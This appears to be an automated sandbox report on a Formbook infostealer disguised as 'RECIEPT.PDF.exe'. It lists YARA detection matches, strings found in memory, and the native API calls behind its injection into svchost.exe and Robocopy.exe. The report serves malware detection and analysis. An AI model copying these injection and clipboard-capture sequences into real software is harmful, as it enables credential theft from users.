          Source: Robocopy.exe, 00000006.00000002.4781250480.000000000074F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: Robocopy.exe, 00000006.00000003.2861006360.00000000078C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: Robocopy.exe, 00000006.00000002.4791340165.0000000005950000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000040E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: Robocopy.exe, 00000006.00000002.4791340165.0000000005950000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000040E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
          Source: Robocopy.exe, 00000006.00000002.4791340165.0000000004FE4000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.0000000003774000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2970976334.000000002CF14000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4786140972.0000000005440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2668528829.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2668528829.0000000005BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4786140972.0000000004A40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: initial sampleStatic PE information: Filename: RECIEPT.PDF.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C8D3 NtClose,2_2_0042C8D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,2_2_03A72C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04644650 NtSuspendThread,LdrInitializeThunk,6_2_04644650
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04644340 NtSetContextThread,LdrInitializeThunk,6_2_04644340
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642C60 NtCreateKey,LdrInitializeThunk,6_2_04642C60
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04642C70
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04642CA0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04642D30
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04642D10
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04642DF0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642DD0 NtDelayExecution,LdrInitializeThunk,6_2_04642DD0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04642EE0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04642E80
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642F30 NtCreateSection,LdrInitializeThunk,6_2_04642F30
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642FE0 NtCreateFile,LdrInitializeThunk,6_2_04642FE0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642FB0 NtResumeThread,LdrInitializeThunk,6_2_04642FB0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642AF0 NtWriteFile,LdrInitializeThunk,6_2_04642AF0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642AD0 NtReadFile,LdrInitializeThunk,6_2_04642AD0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642B60 NtClose,LdrInitializeThunk,6_2_04642B60
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04642BE0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04642BF0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04642BA0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046435C0 NtCreateMutant,LdrInitializeThunk,6_2_046435C0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046439B0 NtGetContextThread,LdrInitializeThunk,6_2_046439B0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642C00 NtQueryInformationProcess,6_2_04642C00
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642CF0 NtOpenProcess,6_2_04642CF0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642CC0 NtQueryVirtualMemory,6_2_04642CC0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642D00 NtSetInformationFile,6_2_04642D00
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642DB0 NtEnumerateKey,6_2_04642DB0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642E30 NtWriteVirtualMemory,6_2_04642E30
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642EA0 NtAdjustPrivilegesToken,6_2_04642EA0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642F60 NtCreateProcessEx,6_2_04642F60
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642FA0 NtQuerySection,6_2_04642FA0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642F90 NtProtectVirtualMemory,6_2_04642F90
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642AB0 NtWaitForSingleObject,6_2_04642AB0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04642B80 NtQueryInformationFile,6_2_04642B80
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04643010 NtOpenDirectoryObject,6_2_04643010
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04643090 NtSetValueKey,6_2_04643090
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04643D70 NtOpenThread,6_2_04643D70
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04643D10 NtOpenProcessToken,6_2_04643D10
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004F9150 NtCreateFile,6_2_004F9150
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004F92C0 NtReadFile,6_2_004F92C0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004F93B0 NtDeleteFile,6_2_004F93B0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004F9450 NtClose,6_2_004F9450
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004F95C0 NtAllocateVirtualMemory,6_2_004F95C0
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004096A00_2_004096A0
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0042200C0_2_0042200C
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0041A2170_2_0041A217
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004122160_2_00412216
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0042435D0_2_0042435D
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004033C00_2_004033C0
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044F4300_2_0044F430
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004125E80_2_004125E8
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044663B0_2_0044663B
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004138010_2_00413801
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0042096F0_2_0042096F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004129D00_2_004129D0
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004119E30_2_004119E3
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0041C9AE0_2_0041C9AE
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0047EA6F0_2_0047EA6F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0040FA100_2_0040FA10
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044EB5F0_2_0044EB5F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00423C810_2_00423C81
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00411E780_2_00411E78
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00442E0C0_2_00442E0C
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00420EC00_2_00420EC0
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044CF170_2_0044CF17
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00444FD20_2_00444FD2
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_03F0A6800_2_03F0A680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004188632_2_00418863
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028802_2_00402880
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100912_2_00410091
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100932_2_00410093
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416A532_2_00416A53
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032002_2_00403200
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102B32_2_004102B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3332_2_0040E333
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024502_2_00402450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EEF32_2_0042EEF3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC02C02_2_03AC02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF41A22_2_03AF41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD20002_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE44202_2_03AE4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABEFA02_2_03ABEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE2F302_2_03AE2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADCD1F2_2_03ADCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE1AA32_2_03AE1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD59102_2_03AD5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
